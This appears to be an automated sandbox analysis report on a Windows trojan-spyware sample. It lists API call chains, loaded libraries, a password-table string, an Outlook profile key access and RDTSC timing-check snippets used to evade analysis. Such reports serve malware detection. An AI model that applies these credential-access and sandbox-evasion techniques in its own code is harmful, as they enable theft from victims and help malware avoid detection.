            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D1AFEB7_2_37D1AFEB
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D167B07_2_37D167B0
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D10FA87_2_37D10FA8
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D13F707_2_37D13F70
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D13F607_2_37D13F60
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D15F107_2_37D15F10
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D15F017_2_37D15F01
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D136C07_2_37D136C0
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D136B07_2_37D136B0
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D196B87_2_37D196B8
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D156507_2_37D15650
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D186407_2_37D18640
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D156607_2_37D15660
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D12E107_2_37D12E10
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D14DB07_2_37D14DB0
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D14DA07_2_37D14DA0
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D125507_2_37D12550
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D125607_2_37D12560
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D19D007_2_37D19D00
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D174C87_2_37D174C8
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D11CB07_2_37D11CB0
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D174B87_2_37D174B8
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D11CA07_2_37D11CA0
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D16C187_2_37D16C18
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D16C097_2_37D16C09
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D143C87_2_37D143C8
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D143B97_2_37D143B9
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D1A3527_2_37D1A352
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D163587_2_37D16358
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D17B4F7_2_37D17B4F
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D163687_2_37D16368
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D13B187_2_37D13B18
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D13B087_2_37D13B08
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D15AB87_2_37D15AB8
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D15AA87_2_37D15AA8
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D132687_2_37D13268
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D152077_2_37D15207
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D152087_2_37D15208
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D129B87_2_37D129B8
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D1A9A07_2_37D1A9A0
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D129A87_2_37D129A8
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D121087_2_37D12108
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D1F1307_2_37D1F130
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D118587_2_37D11858
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D100407_2_37D10040
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D170707_2_37D17070
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D170617_2_37D17061
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D148107_2_37D14810
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_37D148207_2_37D14820
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_38246FA07_2_38246FA0
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_3824D6087_2_3824D608
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_3824E7C87_2_3824E7C8
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_382483287_2_38248328
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: String function: 00402C41 appears 51 times
            Source: V7OHj6ISEo.exe, 00000001.00000000.1288162185.0000000000455000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs V7OHj6ISEo.exe
            Source: V7OHj6ISEo.exe, 00000007.00000002.2542671564.000000000494A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs V7OHj6ISEo.exe
            Source: V7OHj6ISEo.exe, 00000007.00000002.2562691852.0000000034DF7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs V7OHj6ISEo.exe
            Source: V7OHj6ISEo.exe, 00000007.00000002.2539243957.0000000000455000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs V7OHj6ISEo.exe
            Source: V7OHj6ISEo.exeBinary or memory string: OriginalFilenamesupraocular tailorizes.exeDVarFileInfo$ vs V7OHj6ISEo.exe
            Source: V7OHj6ISEo.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/8@5/5
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 1_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_004034A5
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 7_2_004034A5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,7_2_004034A5
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 1_2_00404850 GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,1_2_00404850
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 1_2_00402104 CoCreateInstance,1_2_00402104
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeFile created: C:\Users\user\AppData\Local\IwJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeMutant created: NULL
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeFile created: C:\Users\user~1\AppData\Local\Temp\nswEC8A.tmpJump to behavior
            Source: V7OHj6ISEo.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: V7OHj6ISEo.exe, 00000007.00000002.2564613486.000000003611D000.00000004.00000800.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000002.2563111506.0000000035208000.00000004.00000800.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000002.2563111506.00000000351E5000.00000004.00000800.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000002.2563111506.00000000351D5000.00000004.00000800.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000002.2563111506.00000000351F3000.00000004.00000800.00020000.00000000.sdmp, V7OHj6ISEo.exe, 00000007.00000002.2563111506.0000000035214000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: V7OHj6ISEo.exeVirustotal: Detection: 76%
            Source: V7OHj6ISEo.exeReversingLabs: Detection: 60%
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeFile read: C:\Users\user\Desktop\V7OHj6ISEo.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\V7OHj6ISEo.exe "C:\Users\user\Desktop\V7OHj6ISEo.exe"
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess created: C:\Users\user\Desktop\V7OHj6ISEo.exe "C:\Users\user\Desktop\V7OHj6ISEo.exe"
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess created: C:\Users\user\Desktop\V7OHj6ISEo.exe "C:\Users\user\Desktop\V7OHj6ISEo.exe"Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: V7OHj6ISEo.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000001.00000002.1838395220.0000000005033000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeCode function: 1_2_75561B5F GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,1_2_75561B5F
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeFile created: C:\Users\user\AppData\Local\Temp\nscEDE4.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeAPI/Special instruction interceptor: Address: 59619F0
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeAPI/Special instruction interceptor: Address: 3F019F0
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeRDTSC instruction interceptor: First address: 592B615 second address: 592B615 instructions: 0x00000000 rdtsc 0x00000002 cmp dl, al 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F47E8B99E15h 0x00000008 test cx, dx 0x0000000b inc ebp 0x0000000c inc ebx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeRDTSC instruction interceptor: First address: 3ECB615 second address: 3ECB615 instructions: 0x00000000 rdtsc 0x00000002 cmp dl, al 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F47E93328C5h 0x00000008 test cx, dx 0x0000000b inc ebp 0x0000000c inc ebx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeMemory allocated: 350F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeMemory allocated: 34C40000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 599886Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 599563Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 599438Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 599313Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 599188Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 599063Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 598953Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 598843Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 598734Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 598625Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 598516Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 598391Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 598281Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 598157Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 598030Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 597920Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 597804Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 597688Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 597563Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 597438Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 597313Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 597200Jump to behavior
            Source: C:\Users\user\Desktop\V7OHj6ISEo.exeThread delayed: delay time: 597092Jump to behavior
